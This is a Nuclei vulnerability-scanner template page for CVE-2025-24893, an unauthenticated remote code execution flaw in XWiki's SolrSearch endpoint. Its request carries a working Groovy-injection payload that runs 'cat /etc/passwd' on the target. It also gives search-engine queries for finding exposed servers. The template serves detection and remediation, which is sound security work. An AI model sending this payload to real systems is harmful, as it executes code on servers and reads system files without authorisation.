Skip to content
Nuclei Templates

XWiki Platform - Remote Code Execution

ID: CVE-2025-24893

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,xwiki,rce

Description

Section titled “Description”

Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity, and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1.

YAML Source

Section titled “YAML Source”
id: CVE-2025-24893


info:
  name: XWiki Platform - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity, and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1.
  impact: |
    An attacker can execute arbitrary code on the server, leading to a complete compromise of the XWiki instance.
  remediation: |
    Upgrade to XWiki 15.10.11, 16.4.1, or 16.5.0RC1 to mitigate this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-rr6p-3pfg-562j
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24893
    cwe-id: CWE-95
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rce


http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20"


    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
          - "wiki"
        condition: and


      - type: word
        part: content_type
        words:
          - "application/rss+xml"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d15b04e5221ff89363b9c8b994efced59b2a4c5f82288f6d5083b3ac8f2690a9022045df14bf5a2d68dafad8080be2bc05b169c818e9c6b1133a04bfac288c5cf4cd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-24893.yaml"

View on Github